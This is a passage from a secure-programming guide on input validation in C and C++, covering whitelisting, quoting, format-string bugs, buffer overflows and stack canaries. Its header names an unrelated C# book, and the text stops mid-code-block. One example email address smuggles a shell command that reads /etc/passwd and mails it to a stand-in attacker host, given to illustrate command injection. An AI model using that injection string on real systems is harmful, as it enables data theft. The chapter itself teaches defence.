Input Validation - Adaptive Code via C#. Agile coding with design patterns and SOLID principles (2014)

Chapter 3. Input Validation

Eavesdropping attacks are often easy to launch, but most people don't worry about them in their applications. Instead, they tend to worry about what malicious things can be done on the machine on which the application is running. Most people are far more worried about active attacks than they are about passive attacks.

Pretty much every active attack out there is the result of some kind of input from an attacker. Secure programming is largely about making sure that inputs from bad people do not do bad things. Indeed, most of this book addresses how to deal with malicious inputs. For example, cryptography and a strong authentication protocol can help prevent attackers from capturing someone else's login credentials and sending those credentials as input to the program.

If this entire book focuses primarily on preventing malicious inputs, why do we have a chapter specifically devoted to this topic? It's because this chapter is about one important class of defensive techniques: input validation.

In this chapter, we assume that people are connected to our software, and that some of them may send malicious data (even if we think there is a trusted client on the other end). One question we really care about is this: "What does our application do with that data?" In particular, does the program take data that should be untrusted and do something potentially security-critical with it? More importantly, can any untrusted data be used to manipulate the application or the underlying system in a way that has security implications?

3.1. Understanding Basic Data Validation Techniques

Problem

You have data coming into your application, and you would like to filter or reject data that might be malicious.

Solution

Perform data validation at all levels whenever possible. At the very least, make sure data is filtered on input.

Match constructs that are known to be valid and harmless. Reject anything else.

In addition, be sure to be skeptical about any data coming from a potentially insecure channel. In a client-server architecture, for example, even if you wrote the client, the server should never assume it is talking to a trusted client.

Discussion

Applications should not trust any external input. We have often seen situations in which people had a custom client-server application and the application developer assumed that, because the client was written in house by trusted, strong coders, there was nothing to worry about in terms of malicious data being injected.

Those kinds of assumptions lead people to do things that turn out badly, such as embedding in a client SQL queries or shell commands that get sent to a server and executed. In such a scenario, an attacker who is good at reverse engineering can replace the SQL code in the client-side binary with malicious SQL code (perhaps code that reads private records or deletes important data). The attacker could also replace the actual client with a handcrafted client.

In many situations, an attacker who does not even have control over the client is nevertheless able to inject malicious data. For example, he might inject bogus data into the network stream. Cryptography can sometimes help, but even then, we have seen situations in which the attacker did not need to send data that decrypted properly to cause a problem. A buffer overflow in the portion of an application that does the decryption is one example.

You can regard input validation as a kind of access control mechanism. For example, you will generally want to validate that the person on the other end of the connection has the right credentials to perform the operations that she is requesting. However, when you're doing data validation, most often you'll be worried about input that might do things that no user is supposed to be able to do.

For example, an access control mechanism might determine whether a user has the right to use your application to send email. If the user has that privilege, and your software calls out to the shell to send email (which is generally a bad idea), the user should not be able to manipulate the data in such a way that he can do anything other than send mail as intended.

Let's look at basic rules for proper data validation:

Assume all input is guilty until proven otherwise.

As we said earlier, you should never trust external input that comes from outside the trusted base. In addition, you should be very skeptical about which components of the system are trusted, even after you have authenticated the user on the other end!

Prefer rejecting data to filtering data.

If you determine that a piece of data might possibly be malicious, your best bet from a security perspective is to assume that using the data will screw you up royally no matter what you do, and act accordingly. In some environments, you might need to be able to handle arbitrary data, in which case you will need to treat all input in a way that ensures everything is benign. Avoid the latter situation if possible, because it is a lot harder to get right.

Perform data validation both at input points and at the component level.

One of the most important principles in computer security, defense in depth, states that you should provide multiple defenses against a problem if a single defense may fail. This is important in input validation. You can check the validity of data as it comes in from the network, and you can check it right before you use the data in a manner that might possibly have security implications. However, each one of these techniques alone is somewhat error-prone.

When you're checking input at the points where data arrives, be aware that components might get ripped out and matched with code that does not do the proper checking, making the components less robust than they should be. More importantly, it is often very difficult to understand enough about the context of the data to make validation easy when data is fresh from the network. That is, routines that read from a socket usually do not understand anything about the state the application is in. Without such knowledge, input routines can do only rudimentary filtering.

On the other hand, when you're checking input at the point before you use it, it's often easy to forget to perform the check. Most of the time, you will want to make life easier by producing your own wrapper API to do the filtering, but sometimes you might forget to call it or end up calling it improperly. For example, many people try to use strncpy( ) to help prevent buffer overflows, but it is easy to use this function in the wrong way, as we discuss in Recipe 3.3.

Do not accept commands from the user unless you parse them yourself.

Many data input problems involve the program's passing off data that came from an untrusted source to some other entity that actually parses and acts on the data. If the component doing the parsing has to trust its caller, bad things can happen if your software does not do the proper checking. The best known example of this is the Unix command shell. Sometimes, programs will accomplish tasks by using functions such as system( ) or popen( ) that invoke a shell (which is often a bad idea by itself; see Recipe 1.7). (We'll look at the shell input problem later in this chapter.) Another popular example is the database query using the SQL language. (We'll discuss input validation problems with SQL in Recipe 3.11.)

Beware of special commands, characters, and quoting.

One obvious thing to do when using a command language such as the Unix shell or SQL is to construct commands in trusted software, instead of allowing users to send commands that get proxied. However, there is another "gotcha" here. Suppose that you provide users the ability to search a database for a word. When the user gives you that word, you may be inclined to concatenate it to your SQL command. If you do not validate the input, the user might be able to run other commands.

Consider what happens if you have a server application that, among other things, can send email. Suppose that the email address comes from an untrusted client. If the email address is placed into a buffer using a format string like "/bin/mail %s < /tmp/email", what happens if the user submits the following email address: "dummy@address.com; cat /etc/passwd | mail some@attacker.org"?

Make policy decisions based on a "default deny" rule.

There are two different approaches to data filtering. With the first, known as whitelisting, you accept input as valid only if it meets specific criteria. Otherwise, you reject it. If you do this, the major thing you need to worry about is whether the rules that define your whitelist are actually correct!

With the other approach, known as blacklisting, you reject only those things that are known to be bad. It is much easier to get your policy wrong when you take this approach.

For example, if you really want to invoke a mail program by calling a shell, you might take a whitelist approach in which you allow only well-formed email addresses, as discussed in Recipe 3.9. Or you might use a slightly more liberal (less exact) whitelist policy in which you only allow letters, digits, the @ sign, and periods.

With a blacklist approach, you might try to block out every character that might be leveraged in an attack. It is hard to be sure that you are not missing something here, particularly if you try to consider every single operational environment in which your software may be deployed. For example, if calling out to a shell, you may find all the special characters for the bash shell and check for those, but leave people using tcsh (or something unusual) open to attack.
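As a minimal sketch of the more liberal whitelist policy described above, the following C function accepts a string only if every byte is a letter, a digit, the @ sign, or a period. The name is_plausible_address and the max_len parameter are hypothetical, chosen for illustration; a stricter check would follow the well-formedness rules of Recipe 3.9.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns true only if addr is non-empty, shorter than
 * max_len, and made up entirely of ASCII letters, digits, '@', and '.'.
 * Everything else is rejected (default deny). */
bool is_plausible_address(const char *addr, size_t max_len) {
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789@.";
    size_t len;

    if (addr == NULL) return false;
    len = strlen(addr);
    if (len == 0 || len >= max_len) return false;

    /* strspn() returns the length of the leading run that consists only of
     * allowed bytes; the input passes only if that run covers all of it. */
    return strspn(addr, allowed) == len;
}
```

With this check in place, the address "dummy@address.com; cat /etc/passwd | mail some@attacker.org" from the earlier example is rejected, because it contains spaces, a semicolon, slashes, and a pipe character.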

You can look for a quoting mechanism, but know how to use it properly.

Sometimes, you really do need to be able to accept arbitrary data from an untrusted source and use that data in a security-critical way. For example, you might want to be able to put arbitrary contents from arbitrary documents into a database. In such a case, you might look for some kind of quoting mechanism. For example, you can usually stick untrusted data in single quotes in such an environment.

However, you need to be aware of ways in which an attacker can leave the quoted environment, and you must actively make sure that the attacker does not try to use them. For example, what happens if the attacker puts a single quote in the data? Will that end the quoting, allowing the rest of the attacker's data to do malicious things? If there are such escapes, you should check for them. In this particular example, you might be able to replace quotes in the attacker's data with a backslash followed by a quote.

When designing your own quoting mechanisms, do not allow escapes.

Following from the previous point, if you need to filter data instead of rejecting potentially harmful data, it is useful to provide functions that properly quote an arbitrary piece of data for you. For example, you might have a function that quotes a string for a database, ensuring that the input will always be interpreted as a single string and nothing more. Such a function would put quotes around the string and additionally escape anything that could thwart the surrounding quotes (such as a nested quote).
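A quoting function of this kind might look like the following sketch. It assumes, purely for illustration, a target language in which strings are delimited by single quotes and a backslash escapes the next character; the name quote_string is hypothetical. The escaping rules must match whatever component actually parses the result, so treat this as a pattern rather than a drop-in routine.

```c
#include <stddef.h>

/* Hypothetical quoting helper. Writes 'in' to 'out' wrapped in single
 * quotes, prefixing every embedded single quote or backslash with a
 * backslash. Returns 0 on success, or -1 if out (outsize bytes) is too
 * small, in which case out is left as an empty string when possible. */
int quote_string(const char *in, char *out, size_t outsize) {
    size_t used = 0;

    if (outsize < 3) goto fail;          /* room for '' plus terminator */
    out[used++] = '\'';
    for (; *in != '\0'; in++) {
        size_t need = (*in == '\'' || *in == '\\') ? 2 : 1;

        /* Always keep two bytes in reserve: closing quote and terminator. */
        if (used + need + 2 > outsize) goto fail;
        if (need == 2) out[used++] = '\\';
        out[used++] = *in;
    }
    out[used++] = '\'';
    out[used] = '\0';
    return 0;

fail:
    if (outsize > 0) out[0] = '\0';
    return -1;
}
```

Escaping the backslash as well as the quote matters here: otherwise an attacker could supply a trailing backslash that neutralizes the closing quote.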

The better you understand the data, the better you can filter it.

Rough heuristics like "accept the following characters" do not always work well for data validation. Even if you filter out all bad characters, are the resulting combinations of benign characters a problem? For example, if you pass untrusted data through a shell, do you want to take the risk that an attacker might be able to ignore metacharacters but still do some damage by throwing in a well-placed shell keyword?

The best way to ensure that data is not bad is to do your very best to understand the data and the context in which that data will be used. Therefore, even if you're passing data on to some other component, if you need to trust the data before you send it, you should parse it as accurately as possible. Moreover, in situations where you cannot be accurate, at least be conservative, and assume that the data is malicious.

See Also

Recipe 1.7, Recipe 3.3, Recipe 3.9, Recipe 3.11

3.2. Preventing Attacks on Formatting Functions

Problem

You use functions such as printf( ) or syslog( ) in your program, and you want to ensure that you use them in such a way that an attacker cannot coerce them into behaving in ways that you do not intend.

Solution

Functions such as the printf( ) family of functions provide a flexible and powerful way to format data easily. Unfortunately, they can be extremely dangerous as well. The guidelines outlined in Section 3.2.3 will help you avert many of the problems with these functions.

Discussion

The printf( ) family of functions—and other functions that use them, such as syslog( ) on Unix systems—all require an argument that specifies a format, as well as a variable number of additional arguments that are substituted at various locations in the format string to produce formatted output. The functions come in two major varieties:

§ Those that output to a file (printf( ) outputs to stdout)

§ Those that output to a string

Both can be dangerous, but the latter variety is significantly more so.

The format string is copied, character by character, until a percent (%) symbol is encountered. The characters that immediately follow the percent symbol determine what will be output in their place. For each substitution in the format string, the next argument in the variable argument list is used. Because of the way that variable-sized argument lists work in C (see Recipe 13.4), the functions assume that the number of arguments present in the argument list is equal to the number of substitutions required by the format string. The GCC compiler in particular will recognize calls to the functions in the printf( ) family, and it will emit warnings if it detects data type mismatches or an incorrect number of arguments in the variable argument list.

If you adhere to the following guidelines when using the printf( ) family of functions, you can be reasonably certain that you are using the functions safely:

Beware of the "%n" substitution.

All but one of the substitutions recognized by the printf( ) family of functions use arguments from the variable argument list as data to be substituted into the output. The lone exception is "%n", which writes the number of bytes written to the output buffer or file into the memory location pointed to by the next argument in the argument list.

While the "%n" substitution has its place, few programmers are aware of it and its implications. In particular, if external input is used for the format string, an attacker can embed a "%n" substitution into the format string to overwrite portions of the stack. The real problem occurs when all of the arguments in the variable argument list have been exhausted. Because arguments are passed on the stack in C, the formatting function will write into the stack.

To combat malicious uses of "%n", Immunix has produced a set of patches for glibc 2.2 (the standard C runtime library for Linux) known as FormatGuard. The patches take advantage of a GCC compiler extension that allows the preprocessor to distinguish between macros having the same name, but different numbers of arguments. FormatGuard essentially consists of a large set of macros for the syslog( ), printf( ), fprintf( ), sprintf( ), and snprintf( ) functions; the macros call safe versions of the respective functions. The safe functions count the number of substitutions in the format string, and ensure that the proper number of arguments has been supplied.

Do not use a string from an external source directly as the format specification.

Strings obtained from an external source may contain unexpected percent symbols in them, causing the formatting function to attempt to substitute arguments that do not exist. If you need simply to output the string str (to stdout using printf( ), for example), do the following:

printf("%s", str);

Following this rule to the letter is not always desirable. In particular, your program may need to obtain format strings from a data file as a consequence of internationalization requirements. The format strings will vary to some extent depending on the language in use, but they should always have identical substitutions.
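One way to enforce "identical substitutions" is to compare each format string loaded from a data file against a trusted one compiled into the program. The sketch below is a simplified illustration, not a complete printf( ) parser: the names next_spec and same_conversions are hypothetical, it requires each conversion specification to match byte for byte and in the same order, it refuses "%n" outright, and it does not handle reordered positional arguments.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Find the next conversion specification in s. On success, store its start
 * in *spec and its length in *len, and return a pointer just past it.
 * Returns NULL when none remains. "%%" consumes no argument and is skipped. */
static const char *next_spec(const char *s, const char **spec, size_t *len) {
    while ((s = strchr(s, '%')) != NULL) {
        const char *end;

        if (s[1] == '%') { s += 2; continue; }
        /* Skip flags, width, precision, and length modifiers. */
        end = s + 1 + strspn(s + 1, "-+ #0123456789.*hlLqjzt");
        if (*end != '\0') end++;         /* include the conversion character */
        *spec = s;
        *len = (size_t)(end - s);
        return end;
    }
    return NULL;
}

/* Returns true only if candidate contains exactly the same conversion
 * specifications as trusted, in the same order, and none of them is %n. */
bool same_conversions(const char *trusted, const char *candidate) {
    const char *a = NULL, *b = NULL;
    size_t alen = 0, blen = 0;

    for (;;) {
        trusted = next_spec(trusted, &a, &alen);
        candidate = next_spec(candidate, &b, &blen);
        if (trusted == NULL || candidate == NULL)
            return trusted == NULL && candidate == NULL;
        if (alen != blen || memcmp(a, b, alen) != 0) return false;
        /* Reject a lone trailing '%' and any form of %n. */
        if (alen < 2 || a[alen - 1] == 'n') return false;
    }
}
```

A program would call same_conversions( ) once when loading each translated string, and fall back to the built-in format if the check fails.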

When using vsprintf( ) or sprintf( ) to output to a string, be very careful of using the "%s" substitution without specifying a precision.

The vsprintf( ) and sprintf( ) functions both assume an infinite amount of space is available in the buffer into which they write their output. It is especially common to use these functions with a statically allocated output buffer. If a string substitution is made without specifying the precision, and that string comes from an external source, there is a good chance that an attacker may attempt to overflow the static buffer by forcing a string that is too long to be written into the output buffer. (See Recipe 3.3 for a discussion of buffer overflows.)

One solution is to check the length of the string to be substituted into the output before using it with vsprintf( ) or sprintf( ). Unfortunately, this solution is error-prone, especially later in your program's life when another programmer has to make a change to the size of the buffer or the format string, necessitating a change to the check.

A better solution is to use a precision modifier in the format string. For example, if no more than 12 characters from a string should ever be substituted into the output, use "%.12s" instead of simply "%s". The advantage to this solution is that it is part of the formatting function call; thus, it is less likely to be overlooked in the event of a later change to the format string.
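The sketch below shows one way to keep the precision and the buffer size tied to a single constant, so that a later change to one cannot silently invalidate the other. The names USER_SHOWN, USER_LINE_SIZE, and format_user are hypothetical, and the sketch uses snprintf( ) rather than sprintf( ) as an extra safeguard.

```c
#include <stdio.h>

#define USER_SHOWN 12                    /* most bytes of name ever emitted */
#define STR_(x) #x
#define STR(x) STR_(x)                   /* turns 12 into the text "12" */

/* sizeof("user=") counts the prefix plus the terminator. */
#define USER_LINE_SIZE (sizeof("user=") + USER_SHOWN)

/* Hypothetical helper: formats "user=<name>", copying at most USER_SHOWN
 * bytes of name no matter how long the caller-supplied string is. */
void format_user(char out[USER_LINE_SIZE], const char *name) {
    /* The format expands to "user=%.12s". */
    snprintf(out, USER_LINE_SIZE, "user=%." STR(USER_SHOWN) "s", name);
}
```

Because the precision is generated from USER_SHOWN, changing that one constant adjusts both the format string and the buffer size.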

Avoid using vsprintf( ) and sprintf( ). Use vsnprintf( ) and snprintf( ) or vasprintf( ) and asprintf( ) instead. Alternatively, use a secure string library such as SafeStr (see Recipe 3.4).

The functions vsprintf( ) and sprintf( ) assume that the buffer into which they write their output is large enough to hold it all. This is never a safe assumption to make and frequently leads to buffer overflow vulnerabilities. (See Recipe 3.3.)

The functions vasprintf( ) and asprintf( ) dynamically allocate a buffer to hold the formatted output that is exactly the required size. There are two problems with these functions, however. The first is that they're not portable. Most modern BSD derivatives (Darwin, FreeBSD, NetBSD, and OpenBSD) have them, as does Linux. Unfortunately, older Unix systems and Windows do not. The other problem is that they're slower because they need to make two passes over the format string, one to calculate the required buffer size, and the other to actually produce output in the allocated buffer.

The functions vsnprintf( ) and snprintf( ) are just as fast as vsprintf( ) and sprintf( ), but like vasprintf( ) and asprintf( ), they are not yet portable. They are defined in the C99 standard for C, and they typically enjoy the same availability as vasprintf( ) and asprintf( ). They both require an additional argument that specifies the length of the output buffer, and they will never write more data into the buffer than will fit, including the NULL terminating character.
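Under C99, snprintf( ) returns the number of characters that would have been written had the buffer been large enough, which lets the caller detect truncation. The following sketch, with a hypothetical helper named build_path, treats a truncated result as a failure rather than silently using it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: builds "<dir>/<file>" in out (outsize bytes).
 * Returns true only if the whole result fit. A negative return value
 * (an output error) or a value of at least outsize (truncation) is
 * reported as failure. */
bool build_path(char *out, size_t outsize, const char *dir, const char *file) {
    int n = snprintf(out, outsize, "%s/%s", dir, file);

    return n >= 0 && (size_t)n < outsize;
}
```

Checking for truncation matters for security as well as correctness: a truncated path or command can name something quite different from what the program intended.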

See Also

§ FormatGuard from Immunix: http://www.immunix.org/formatguard.html

§ Recipe 3.3, Recipe 13.4

3.3. Preventing Buffer Overflows

Problem

C and C++ do not perform array bounds checking, which turns out to be a security-critical issue, particularly in handling strings. The risks increase even more dramatically when user-controlled data is on the program stack (i.e., is a local variable).

Solution

There are many solutions to this problem, but none are satisfying in every situation. You may want to rely on operational protections such as StackGuard from Immunix, use a library for safe string handling, or even use a different programming language.

Discussion

Buffer overflows get a lot of attention in the technical world, partially because they constitute one of the largest classes of security problems in code, but also because they have been around for a long time and are easy to get rid of, yet still are a huge problem.

Buffer overflows are generally very easy for a C or C++ programmer to understand. An experienced programmer has invariably written off the end of an array, or indexed into the wrong memory because she improperly checked the value of the index variable.

Because we assume that you are a C or C++ programmer, we won't insult your intelligence by explaining buffer overflows to you. If you do not already understand the concept, you can consult many other software security books, including Building Secure Software by John Viega and Gary McGraw (Addison Wesley). In this recipe, we won't even focus so much on why buffer overflows are such a big deal (other resources can help you understand that if you're insatiably curious). Instead, we'll focus on state-of-the-art strategies for mitigating these problems.

String handling

Most languages do not have buffer overflow problems at all, because they ensure that writes to memory are always in bounds. This can sometimes be done at compile time, but generally it is done dynamically, right before data gets written. The C and C++ philosophy is different—you are given the ability to eke out more speed, even if it means that you risk shooting yourself in the foot.

Unfortunately, in C and C++, it is not only possible to overflow buffers but also easy, particularly when dealing with strings. The problem is that C strings are not high-level data types; they are arrays of characters. The major consequence of this nonabstraction is that the language does not manage the length of strings; you have to do it yourself. The only time C ever cares about the length of a string is in the standard library, and the length is not related to the allocated size at all—instead, it is delimited by a 0-valued (NULL) byte. Needless to say, this can be extremely error-prone.

One of the simplest examples is the ANSI C standard library function, gets( ):

char *gets(char *str);

This function reads data from the standard input device into the memory pointed to by str until there is a newline or until the end of file is reached. It then returns a pointer to the buffer. In addition, the function NULL-terminates the buffer.

If the buffer in question is a local variable or otherwise lives on the program stack, then the attacker can often force the program to execute arbitrary code by overwriting important data on the stack. This is called a stack-smashing attack. Even when the buffer is heap-allocated (that is, it is allocated with malloc() or new), a buffer overflow can be security-critical if an attacker can write over critical data that happens to be in nearby memory.

The problem with this function is that, no matter how big the buffer is, an attacker can always stick more data into the buffer than it is designed to hold, simply by avoiding the newline.
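A bounded alternative is fgets( ), which takes the size of the buffer. The sketch below wraps it in a hypothetical read_line( ) function that strips the newline and reports over-long lines instead of overflowing; the return-value convention is our own choice for illustration.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical replacement for gets(): reads one line from fp into buf,
 * never storing more than size bytes including the terminator.
 * Returns 1 if the whole line was stored, 0 if it was too long (the excess
 * is discarded), and -1 on end of file or error with nothing read. */
int read_line(FILE *fp, char *buf, size_t size) {
    size_t len;
    int c;

    if (size == 0 || size > INT_MAX) return -1;
    if (fgets(buf, (int)size, fp) == NULL) return -1;

    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';             /* drop the newline */
        return 1;
    }

    /* No newline was stored. If the next byte ends the line or the input,
     * the text fit exactly; otherwise the line was truncated. */
    c = getc(fp);
    if (c == EOF || c == '\n') return 1;

    /* Drain the rest of the line so the next call starts on a fresh one. */
    while (c != '\n' && c != EOF) c = getc(fp);
    return 0;
}
```

Unlike gets( ), this function cannot be made to write past the end of buf by withholding the newline; the worst an attacker can do is have the line reported as too long.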

There are plenty of other places where it is easy to overflow strings. Pretty much any time you perform an operation that writes to a "string," there is room for a problem. One famous example is strcpy( ):

char *strcpy(char *dst, const char *src);

This function copies bytes from the address indicated by src into the buffer pointed to by dst, up to and including the first NULL byte in src. Then it returns dst. No effort is made to ensure that the dst buffer is big enough to hold the contents of the src buffer. Because the language does not track allocated sizes, there is no way for the function to do so.

To help alleviate the problems with functions like strcpy( ) that have no way of determining whether the destination buffer is big enough to hold the result from their respective operations, there are also functions like strncpy( ):

char *strncpy(char *dst, const char *src, size_t len);

The strncpy( ) function is certainly an improvement over strcpy( ), but there are still problems with it. Most notably, if the source buffer contains more data than the limit imposed by the len argument, the destination buffer will not be NULL-terminated. This means the programmer must ensure the destination buffer is NULL-terminated. Unfortunately, the programmer often forgets to do so; there are two reasons for this failure:

§ It's an additional step for what should be a simple operation.

§ Many programmers do not realize that the destination buffer may not be NULL-terminated.

The problems with strncpy( ) are further complicated by the fact that a similar function, strncat( ), treats its length-limiting argument in a completely different manner. The difference in behavior serves only to confuse programmers, and more often than not, mistakes are made. Certainly, we recommend using strncpy( ) over using strcpy( ); however, there are better solutions.
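If you must use strncpy( ), a small wrapper that always performs the extra termination step removes the opportunity to forget it. The following is a minimal sketch; the name copy_string and its boolean result are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical wrapper around strncpy(): copies src into dst, which holds
 * dstsize bytes, always terminates dst, and returns true only if all of
 * src fit without truncation. */
bool copy_string(char *dst, size_t dstsize, const char *src) {
    if (dstsize == 0) return false;

    /* Copy at most dstsize - 1 bytes, leaving room for the terminator. */
    strncpy(dst, src, dstsize - 1);

    /* strncpy() does not terminate dst when src is too long, so do it
     * unconditionally here. */
    dst[dstsize - 1] = '\0';

    return strlen(src) < dstsize;
}
```

Returning whether truncation occurred lets the caller decide to reject the input, which is usually the safer choice than continuing with a shortened string.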

OpenBSD 2.4 introduced two new functions, strlcpy( ) and strlcat( ), that are consistent in their behavior, and they provide an indication back to the caller of how much space in the destination buffer would be required to successfully complete their respective operations without truncating the results. For both functions, the length limit indicates the maximum size of the destination buffer, and the destination buffer is always NULL-terminated, even if the result must be truncated.

Unfortunately, strlcpy( ) and strlcat( ) are not available on all platforms; at present, they seem to be available only on Darwin, FreeBSD, NetBSD, and OpenBSD. Fortunately, they are easy to implement yourself—but you don't have to, because we provide implementations here:

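#include <sys/types.h>
#include <string.h>

/* Copies src into dst, which holds size bytes. dst is always terminated
   when size is nonzero. Returns strlen(src); a return value >= size
   means the result was truncated. */
size_t strlcpy(char *dst, const char *src, size_t size) {
  char       *dstptr = dst;
  size_t     tocopy  = size;
  const char *srcptr = src;

  /* Copy at most size - 1 bytes, stopping after the terminator. */
  if (tocopy && --tocopy) {
    do {
      if (!(*dstptr++ = *srcptr++)) break;
    } while (--tocopy);
  }

  /* Out of room: terminate dst and walk to the end of src for the count. */
  if (!tocopy) {
    if (size) *dstptr = 0;
    while (*srcptr++);
  }

  return (srcptr - src - 1);
}

/* Appends src to dst, which holds size bytes in total. Returns the length
   of the string it tried to create; a return value >= size means the
   result was truncated. */
size_t strlcat(char *dst, const char *src, size_t size) {
  char       *dstptr = dst;
  size_t     dstlen, tocopy = size;
  const char *srcptr = src;

  /* Find the end of dst without reading past size bytes. */
  while (tocopy-- && *dstptr) dstptr++;
  dstlen = dstptr - dst;
  if (!(tocopy = size - dstlen)) return (dstlen + strlen(src));

  /* Copy while room remains, but keep scanning src to compute its length. */
  while (*srcptr) {
    if (tocopy != 1) {
      *dstptr++ = *srcptr;
      tocopy--;
    }
    srcptr++;
  }
  *dstptr = 0;

  return (dstlen + (srcptr - src));
}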

As part of its security push, Microsoft has developed a new set of string-handling functions for C and C++ that are defined in the header file strsafe.h. The new functions handle both ANSI and Unicode character sets, and each function is available in byte count and character count versions. For more information regarding using strsafe.h functions in your Windows programs, visit the Microsoft Developer's Network (MSDN) reference for strsafe.h.

All of the string-handling improvements we've discussed so far operate using traditional C-style NULL-terminated strings. While strlcat( ), strlcpy( ), and Microsoft's new string-handling functions are vast improvements over the traditional C string-handling functions, they all still require diligence on the part of the programmer to maintain information regarding the allocated size of destination buffers.

An alternative to using traditional C style strings is to use the SafeStr library, which is available from http://www.zork.org/safestr/. The library is a safe string implementation that provides a new, high-level data type for strings, tracks accounting information for strings, and performs many other operations. For interoperability purposes, SafeStr strings can be passed to C string functions, as long as those functions use the string in a read-only manner. (We discuss SafeStr in some detail in Recipe 3.4.)

Finally, applications that transfer strings across a network should consider including a string's length along with the string itself, rather than requiring the recipient to rely on finding the NULL-terminating character to determine the length of the string. If the length of the string is known up front, the recipient can allocate a buffer of the proper size up front and read the appropriate amount of data into it. The alternative is to read byte-by-byte, looking for the NULL-terminator, and possibly repeatedly resizing the buffer. Dan J. Bernstein has defined a convention called Netstrings (http://cr.yp.to/proto/netstrings.txt) for encoding the length of a string with the string. This protocol simply has you send the length of the string represented in ASCII, then a colon, then the string itself, then a trailing comma. For example, if you were to send the 13-character string "Hello, World!" over a network, you would send:

13:Hello, World!,

Note that the Netstrings representation does not include the NULL-terminator, as that is really part of the machine-specific representation of a string, and is not necessary on the network.
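The encoding is simple enough to sketch in a few lines of C. The function names netstring_encode and netstring_decode and their return conventions are hypothetical; the decoder rejects leading zeros, guards against overflow in the length field, and confirms that the declared length fits within the data actually received before trusting it.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical encoder: writes the netstring form of the len bytes at data
 * into out. Returns the encoded length, or 0 if out is too small. The
 * output is not NULL-terminated. */
size_t netstring_encode(char *out, size_t outsize, const void *data, size_t len) {
    int hdr = snprintf(out, outsize, "%zu:", len);

    if (hdr < 0 || (size_t)hdr >= outsize) return 0;
    if (len > outsize - (size_t)hdr - 1) return 0;   /* payload + ',' */
    memcpy(out + hdr, data, len);
    out[(size_t)hdr + len] = ',';
    return (size_t)hdr + len + 1;
}

/* Hypothetical decoder: returns 1 and sets *payload and *plen if the inlen
 * bytes at in begin with a well-formed netstring, 0 otherwise. */
int netstring_decode(const char *in, size_t inlen,
                     const char **payload, size_t *plen) {
    size_t i = 0, n = 0;

    if (inlen == 0 || in[0] < '0' || in[0] > '9') return 0;
    /* A leading zero is allowed only for the length 0 itself. */
    if (in[0] == '0' && inlen > 1 && in[1] >= '0' && in[1] <= '9') return 0;

    while (i < inlen && in[i] >= '0' && in[i] <= '9') {
        if (n > (SIZE_MAX - 9) / 10) return 0;       /* would overflow */
        n = n * 10 + (size_t)(in[i++] - '0');
    }
    if (i >= inlen || in[i++] != ':') return 0;

    /* The payload and its trailing comma must lie within the input. */
    if (n >= inlen - i) return 0;
    if (in[i + n] != ',') return 0;

    *payload = in + i;
    *plen = n;
    return 1;
}
```

Note that the decoder treats the declared length as untrusted input in its own right: it is checked against the number of bytes received before any of the payload is used.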

Using C++

When using C++, you generally have a lot less to worry about when using the standard C++ string library, std::string. This library is designed in such a way that buffer overflows are less likely. Standard I/O using the stream operators (>> and <<) is safe when using the standard C++ string type.

However, buffer overflows when using strings in C++ are not out of the question. First, the programmer may choose to use old fashioned C API functions, which work fine in C++ but are just as risky as they are in C. Second, while C++ usually throws an out_of_range exception when an operation would overflow a buffer, there are two cases where it doesn't.

The first problem area occurs when using the subscript operator, []. This operator doesn't perform bounds checking for you, so be careful with it.

The second problem area occurs when using C-style strings with the C++ standard library. C-style strings are always a risk, because even C++ doesn't know how much memory is allocated to a string. Consider the following C++ program:

#include <iostream>

using namespace std;

// WARNING: This code has a buffer overflow in it.
// Before C++20, operator>> has no way to know how large buf is.
int main(int argc, char *argv[]) {
  char buf[12];

  cin >> buf;
  cout << "You said... " << buf << endl;
}

If you compile the above program without optimization, then you run it, typing in more than 11 printable ASCII characters (remember that C++ will add a NULL to the end of the string), the program will either crash or print out more characters than buf can store. Those extra characters get written past the end of buf.

Also, when indexing a C-style string through C++, C++ always assumes that the indexing is valid, even if it isn't.

Another problem occurs when converting C++-style strings to C-style strings. If you use string::c_str() to do the conversion, you will get a properly NULL-terminated C-style string. However, under the original C++98 and C++03 standards, string::data() returns a pointer to an array that is not guaranteed to be NULL-terminated. That is, under those standards the only difference between c_str() and data() is that c_str() guarantees a trailing NULL. Since C++11, data() also returns a NULL-terminated array, but code that must build with older compilers should not rely on that.

One final point with regard to C++ is that there are plenty of applications not using the standard string library, that are instead using third-party libraries. Such libraries are of varying quality when it comes to security. We recommend using the standard library if at all possible. Otherwise, be careful in understanding the semantics of the library you do use, and the possibilities for buffer overflow.

Stack protection technologies

In C and C++, memory for local variables is allocated on the stack. In addition, information pertaining to the control flow of a program is also maintained on the stack. If an array is allocated on the stack, and that array is overrun, an attacker can overwrite the control flow information that is also stored on the stack. As we mentioned earlier, this type of attack is often referred to as a stack-smashing attack.

Recognizing the gravity of stack-smashing attacks, several technologies have been developed that attempt to protect programs against them. These technologies take various approaches. Some are implemented in the compiler (such as Microsoft's /GS compiler flag, Immunix's StackGuard, and IBM's ProPolice), while others are dynamic runtime solutions (such as Avaya Labs' LibSafe).

All of the compiler-based solutions work in much the same way, although there are some differences in the implementations. They work by placing a "canary" (which is typically some random value) on the stack between the control flow information and the local variables. The code that is normally generated by the compiler to return from the function is modified to check the value of the canary on the stack, and if it is not what it is supposed to be, the program is terminated immediately.

The idea behind using a canary is that an attacker attempting to mount a stack-smashing attack will have to overwrite the canary to overwrite the control flow information. Because the canary is a random value, the attacker cannot know what it is and thus cannot include it in the data used to "smash" the stack.
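
To make the mechanism concrete, here is a minimal sketch that imitates a canary by hand. It is not what /GS or ProPolice actually emit. The struct layout, the names guarded_buf, guarded_init( ), unchecked_fill( ), and guarded_intact( ), and the fixed GUARD_VALUE are all assumptions made for illustration; a real canary is chosen randomly and lives in the function's stack frame.

```c
#include <stddef.h>
#include <string.h>

/* Illustrative constant only; real canaries are random values. */
#define GUARD_VALUE 0x5ca1ab1eUL

/* Hypothetical stand-in for a stack frame: a local buffer followed by
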